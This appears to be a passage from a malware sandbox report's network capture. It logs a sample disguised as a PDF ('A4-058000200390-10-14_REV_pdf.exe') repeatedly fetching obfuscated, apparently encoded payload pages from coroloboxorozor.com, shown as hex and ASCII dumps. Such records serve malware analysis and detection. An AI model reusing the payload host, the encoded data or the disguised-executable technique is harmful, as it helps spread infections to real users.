                                                    Data Ascii: FjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclF
                                                    Feb 23, 2021 09:46:49.688308954 CET1229INData Raw: 46 63 6c 46 6a 46 6a 46 69 46 69 72 46 6a 46 6a 46 6c 46 6a 46 6c 4c 46 6a 46 69 6a 72 46 69 75 63 46 6a 46 69 47 46 6a 46 6a 46 6a 46 6a 46 6c 47 46 63 4c 46 6c 46 6a 46 69 47 63 46 6a 46 6a 46 6a 46 69 46 6a 46 6a 46 69 47 46 6a 46 69 69 63 46
                                                    Data Ascii: FclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFilAFiFjFiilFlAcFicFiFjFiicFiruFiFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlA
                                                    Feb 23, 2021 09:46:49.688333988 CET1230INData Raw: 6a 46 69 6a 46 6c 41 63 46 69 63 46 41 46 6a 46 6c 41 63 46 69 6c 46 41 46 6a 46 63 6a 46 6c 41 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 6c 46 6c 46 6a 46 63 6a 46 6c 72 46 6a 46 6a 46 69 6a 46 6c 69 4c 46 6c 41 63 46 69 63 46 72 46 6a 46 6c 41 63
                                                    Data Ascii: jFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFu
                                                    Feb 23, 2021 09:46:49.688355923 CET1232INData Raw: 46 75 6a 46 6a 46 6a 46 69 6a 46 6a 46 6c 6c 6a 46 6c 41 63 46 69 6c 46 75 46 6a 46 69 69 69 46 75 69 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 6a 46 6a 46 41 72 46 6a 46 6a 46 6a 46 6a 46 6c 41 63 46 69 6c 46 6a 46 6a 46 63 6c 46 6a 46 6a 46
                                                    Data Ascii: FujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFGAFlFjFiilFlAcFicFiFjFiicFijGFlFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcj
                                                    Feb 23, 2021 09:46:49.689474106 CET1233INData Raw: 46 69 46 6a 46 63 6a 46 69 46 6a 46 6a 46 63 75 46 69 69 69 46 6c 75 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 63 46 6a 46 41 72 46 41 72 46 6a 46 6a 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 63 6a 46 6c 63 46 6a 46 6a 46 69 6a 46 6c 41 63 46
                                                    Data Ascii: FiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlA
                                                    Feb 23, 2021 09:46:50.106106043 CET2284OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:46:50.312967062 CET2285INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:46:50 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9956ec78079b7fe40b119ea02652d9df1614070010; expires=Thu, 25-Mar-21 08:46:50 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086faae91f0000fa5ca1262000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=njZD96MeGGnp0OT0z8Fsp0rMsAKxbHeORttwB%2BrS3AiIwnlihgpwZC1CpIerPqNHsjvwDYYIISWuWpZ%2BlRke96z5cn7Nt%2B1H%2FH%2BIcg%2BlfSS9ZWvh"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625fadbb6f50fa5c-AMS
                                                    Data Raw: 31 37 30 30 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c
                                                    Data Ascii: 1700<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFL


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.449753104.21.71.23080C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:47:34.660684109 CET3060OUTGET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:47:34.742083073 CET3082INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:34 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=ddf692e164e229dc73d66edfe1d1c721d1614070054; expires=Thu, 25-Mar-21 08:47:34 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fab97290000d8b50f02c000000001
                                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=t%2FHkoZrji%2BX621Qp%2F%2BUnGjpZCr7idJcUZfS6iq6Hms%2F97b6PPz4WUSHbtj0xTW%2BCqKy6ZqtMcFQaQ7Jwxi3j%2BoRyk5psSeRlrvt%2FaZrthmCgpE9l"}],"max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faed1ddd0d8b5-AMS
                                                    Data Raw: 65 33 61 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46
                                                    Data Ascii: e3a<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcF
                                                    Feb 23, 2021 09:47:34.742105961 CET3083INData Raw: 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 59 6c 46 41 46 6a 46 6a 46 6c 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 46 6a 46 72 63 46 69 75 75 46 6a 46 6a 46 69 72 46 6a 46 6a 46 69 72 46 6a 46 6a 46 6a 46 6a 46 69 72 46 6a 46 6a 46 69 72
                                                    Data Ascii: jFjFjFjFjFjFjFjFiYlFAFjFjFlFjFjFjFjFjFjFlFjFrcFiuuFjFjFirFjFjFirFjFjFjFjFirFjFjFirFjFjFjFjFjFjFirFjFjFjFjFjFjFjFjFjFjFjFiccFiicFAFjFGAFjFjFjFjFilLFAFjFiurFuFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFirjFAFjFilFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFj
                                                    Feb 23, 2021 09:47:34.742121935 CET3084INData Raw: 46 63 6c 46 69 72 72 46 69 69 41 46 75 63 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 69 46 6a 46 6a 46 63 46 69 69 41 46 75 41 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 6c 46 6a 46 6a 46 63 46 69 69 41 46 75 72 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 75 46 6a 46
                                                    Data Ascii: FclFirrFiiAFucFjFjFijFilLFiFjFjFcFiiAFuAFjFjFijFilLFlFjFjFcFiiAFurFjFjFijFilLFuFjFjFcFiiAFuGFjFjFijFilLFcFjFjFcFclFuLFjFuFlAcFliFGFjFjFlGFclFuLFjFlFcjFcLFjFjFijFjFclFLlFjFlFcjFcLFjFjFijFjFlFiiAFAlFjFjFijFilAFcYFjFjFijFclFucFjFlFilLFGFjFjFcFclF
                                                    Feb 23, 2021 09:47:34.742136955 CET3085INData Raw: 41 46 69 63 47 46 6a 46 6a 46 69 6a 46 69 6c 4c 46 69 75 75 46 69 46 6a 46 63 46 63 6c 46 72 6c 46 6a 46 6c 46 6c 46 4c 6a 46 69 63 6c 46 69 6a 41 46 6c 75 46 6c 69 4c 46 63 6a 46 6c 63 46 6a 46 6a 46 63 75 46 6a 46 63 6c 46 6c 72 46 63 6a 46 69
                                                    Data Ascii: AFicGFjFjFijFilLFiuuFiFjFcFclFrlFjFlFlFLjFiclFijAFluFliLFcjFlcFjFjFcuFjFclFlrFcjFijuFjFjFrFclFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFiFjFjFiilFlAcFicFiFjFiicFcuFjFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFl
                                                    Feb 23, 2021 09:47:34.742218971 CET3086INData Raw: 37 66 66 39 0d 0a 6c 41 63 46 69 63 46 47 46 6a 46 6c 41 63 46 69 6c 46 47 46 6a 46 41 4c 46 69 47 4c 46 6c 41 41 46 6c 41 41 46 6c 41 41 46 6c 6c 69 46 69 47 46 6a 46 6a 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 6c 41 63 46 6c 6c 46 6c 46 6a 46
                                                    Data Ascii: 7ff9lAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFi
                                                    Feb 23, 2021 09:47:34.742305994 CET3088INData Raw: 46 6a 46 69 69 63 46 69 6c 41 46 6a 46 6a 46 69 69 6c 46 6c 41 63 46 69 63 46 69 46 6a 46 69 69 63 46 69 72 59 46 6a 46 6a 46 69 69 6c 46 6c 41 63 46 69 63 46 6c 46 6a 46 69 69 41 46 6c 69 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 75 46 6a 46
                                                    Data Ascii: FjFiicFilAFjFjFiilFlAcFicFiFjFiicFirYFjFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAc
                                                    Feb 23, 2021 09:47:34.742322922 CET3089INData Raw: 46 6a 46 6c 41 63 46 69 6c 46 75 46 6a 46 6c 41 63 46 69 6c 46 72 46 6a 46 63 6a 46 6c 47 46 6a 46 6a 46 69 6a 46 69 69 69 46 6c 4c 46 6a 46 6a 46 69 6a 46 75 4c 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 63 6a 46 6c 59 46 6a 46 6a 46 69 6a 46 6c
                                                    Data Ascii: FjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclF
                                                    Feb 23, 2021 09:47:34.742340088 CET3090INData Raw: 46 63 6c 46 6a 46 6a 46 69 46 69 72 46 6a 46 6a 46 6c 46 6a 46 6c 4c 46 6a 46 69 6a 72 46 69 75 63 46 6a 46 69 47 46 6a 46 6a 46 6a 46 6a 46 6c 47 46 63 4c 46 6c 46 6a 46 69 47 63 46 6a 46 6a 46 6a 46 69 46 6a 46 6a 46 69 47 46 6a 46 69 69 63 46
                                                    Data Ascii: FclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFilAFiFjFiilFlAcFicFiFjFiicFiruFiFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlA
                                                    Feb 23, 2021 09:47:34.742355108 CET3092INData Raw: 6a 46 69 6a 46 6c 41 63 46 69 63 46 41 46 6a 46 6c 41 63 46 69 6c 46 41 46 6a 46 63 6a 46 6c 41 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 6c 46 6c 46 6a 46 63 6a 46 6c 72 46 6a 46 6a 46 69 6a 46 6c 69 4c 46 6c 41 63 46 69 63 46 72 46 6a 46 6c 41 63
                                                    Data Ascii: jFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlAcFilFGFjFALFiGLFlAAFlAAFlAAFlliFiGFjFjFjFlAcFiuFcFjFlAcFllFlFjFjFlGFiiiFu
                                                    Feb 23, 2021 09:47:34.742372036 CET3093INData Raw: 46 75 6a 46 6a 46 6a 46 69 6a 46 6a 46 6c 6c 6a 46 6c 41 63 46 69 6c 46 75 46 6a 46 69 69 69 46 75 69 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 6a 46 6a 46 41 72 46 6a 46 6a 46 6a 46 6a 46 6c 41 63 46 69 6c 46 6a 46 6a 46 63 6c 46 6a 46 6a 46
                                                    Data Ascii: FujFjFjFijFjFlljFlAcFilFuFjFiiiFuiFjFjFijFlAcFicFjFjFArFjFjFjFjFlAcFilFjFjFclFjFjFiFirFjFjFlFjFlLFjFijrFiucFjFiGFjFjFjFjFlGFcLFlFjFiGcFjFjFjFiFjFjFiGFjFiicFGAFlFjFiilFlAcFicFiFjFiicFijGFlFjFiilFlAcFicFlFjFiiAFliFjFjFijFlAcFicFuFjFlAcFilFiFjFcj
                                                    Feb 23, 2021 09:47:34.743726015 CET3095INData Raw: 46 69 46 6a 46 63 6a 46 69 46 6a 46 6a 46 63 75 46 69 69 69 46 6c 75 46 6a 46 6a 46 69 6a 46 6c 41 63 46 69 63 46 63 46 6a 46 41 72 46 41 72 46 6a 46 6a 46 6a 46 6c 41 63 46 69 75 46 63 46 6a 46 63 6a 46 6c 63 46 6a 46 6a 46 69 6a 46 6c 41 63 46
                                                    Data Ascii: FiFjFcjFiFjFjFcuFiiiFluFjFjFijFlAcFicFcFjFArFArFjFjFjFlAcFiuFcFjFcjFlcFjFjFijFlAcFicFAFjFlAcFilFAFjFcjFlAFjFjFijFlAcFilFlFjFcjFlrFjFjFijFliLFlAcFicFrFjFlAcFilFuFjFlAcFilFrFjFcjFlGFjFjFijFiiiFlLFjFjFijFuLFjFlAcFiuFcFjFcjFlYFjFjFijFlAcFicFGFjFlA
                                                    Feb 23, 2021 09:47:36.916448116 CET4382OUTGET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Feb 23, 2021 09:47:37.020649910 CET4384INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:36 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d7431070c03d145fc1b740f00718662ff1614070056; expires=Thu, 25-Mar-21 08:47:36 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fab9ffa0000d8b5378a0000000001
                                                    Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mARSgPe7S6fWchZeYaQK4CZiQenKfXfsn7vbgwMzDQ2ZWmyfJ4oUrnxFEyeRGCb5HkVlpudjVhgXTmOGz3GNFnWMvS%2BT%2Bva8zFZeUnM2UimzbKEH"}],"max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faedffc9cd8b5-AMS
                                                    Data Raw: 37 63 39 36 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c 41 46 6c 63 72 46 69 63
                                                    Data Ascii: 7c96<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFLAFlcrFic


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.449764104.21.71.23080C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:47:44.727893114 CET5073OUTGET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:47:44.830785036 CET5074INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:47:44 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=dca7a60f312471aec97222035e3e73aaa1614070064; expires=Thu, 25-Mar-21 08:47:44 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086fabbe7d0000c78590a87000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=m%2FSQLLQhymcqhKEWMw4WdDYgIetxT4pXCGCaQvKAxT0be5%2BWp7qaGnk7Q44vm7ZPjHdTfPLPOiibkl9qQHFusoykdi0ABaZTxflKVqIxlqvozu2C"}],"max_age":604800,"group":"cf-nel"}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625faf10c80ac785-AMS
